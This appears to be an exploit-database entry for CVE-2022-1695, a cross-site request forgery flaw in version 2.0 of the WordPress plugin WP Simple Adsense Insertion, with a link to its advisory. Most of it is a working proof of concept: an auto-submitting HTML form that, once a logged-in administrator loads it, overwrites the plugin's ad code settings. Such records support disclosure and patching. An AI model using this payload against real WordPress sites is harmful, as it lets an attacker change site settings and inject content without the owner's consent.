CVE: CVE-2022-1695

Name: WP Simple Adsense Insertion (wordpress-plugin-for-simple-google-adsense-insertion)

Version: v2.0

Date: 2022-04-17 18:31:35

Advisory: https://wpscan.com/vulnerability/2ac5b87b-1390-41ce-af6e-c50e5709baaa

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/options-general.php?page=wordpress-plugin-for-simple-google-adsense-insertion/WP-Simple-Adsense-Insertion.php" method="POST">
    <input type="text" name="info_update" value="true">
    <input type="text" name="wp_ad_camp_1_code" value="hacked">
    <input type="text" name="wp_ad_camp_2_code" value="">
    <input type="text" name="wp_ad_camp_3_code" value="">
    <input type="text" name="wp_ad_camp_4_code" value="">
    <input type="text" name="wp_ad_camp_5_code" value="">
    <input type="text" name="wp_in_article_ad_code" value="">
    <input type="text" name="wp_post_article_ad_code" value="hacked">
    <input type="text" name="info_update" value="Update options">
</form>
<script>
    document.forms[0].submit();
</script>